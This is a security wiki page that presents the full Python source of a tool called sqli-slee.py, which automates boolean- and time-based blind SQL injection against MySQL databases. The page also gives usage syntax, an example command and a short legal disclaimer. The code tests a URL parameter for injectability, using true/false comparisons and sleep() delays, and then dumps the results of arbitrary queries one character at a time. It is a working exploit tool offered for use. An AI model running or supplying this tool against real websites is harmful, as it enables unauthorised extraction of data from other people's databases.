Questions about this topic? Sign up to ask in the talk tab.

SQL injection/mysqli-blindutils/sqli-slee.py

From NetSec
Revision as of 03:48, 19 November 2012 by JtRIPper (Talk | contribs)

Jump to: navigation, search
c3el4.png
This python script uses time and boolean based blind SQL injection to obtain the desired information from MySQL databases.

Special thanks to Dilon for this tool.

Info

Main article: Web exploitation tools

The syntax of this script is:

 python sqli-slee.py -u [url] -i [injection]

Example

 python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

RPU0j.png The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import sys,re,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
 
    try:
        request = urllib2.urlopen(req)
 
    except HTTPError, e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)
 
    except URLError, e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
 
    return len(request.read())
 
def value(URL):
    target = 0
    end = 0
    next_maybe = 0
    floor = 0
    ceiling = 255
    maybe = int(ceiling)/2
 
    while(end != 9):
        if(is_what(URL, maybe, '>')):	
            floor = maybe
            next_maybe = int(maybe + ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '<')):
            ceiling = maybe
            next_maybe = int(maybe - ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '=')):
            return chr(maybe)
 
        maybe = next_maybe
        end += 1
 
    return 'done'
 
def is_what(URL, maybe, op):
    if(sqli_type == 'boolean'):
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
        if(TrueResponse == ValueResponse):
            return 1
        else:
            return 0
    elif(sqli_type == 'time'):
        start = time.time()
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
        elapsed_time = (time.time() - start)
        if (elapsed_time > 2):
            return 1
        else:
            return 0
 
def vuln_check(URL):
    print('[+] Checking site...')
 
    global TrueResponse
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
 
    if(TrueResponse != FalseResponse):
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'
    else:
        start = time.time()
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
        elapsed_time = (time.time() - start)
 
        if(elapsed_time > 5):
            print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
            return 'time'
        else:
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
            sys.exit(1)
 
def main():
    print('''
                Auto BSQLi tool for MySQL
                ''')
 
    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
    (options, args) = parser.parse_args()
    if(options.URL and options.INJECTION):
        URL = options.URL
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
    else:
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)
 
    global sqli_type
    sqli_type = vuln_check(URL)
    position = 1
    dump = ''
    print('[+] Dumping data...')
 
    while(1):
        if(sqli_type == 'boolean'):
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
        elif(sqli_type == 'time'):
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
 
        if(letter == 'done'):
            break
 
        dump = dump + letter
        position += 1
 
    if(dump):
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":
    main()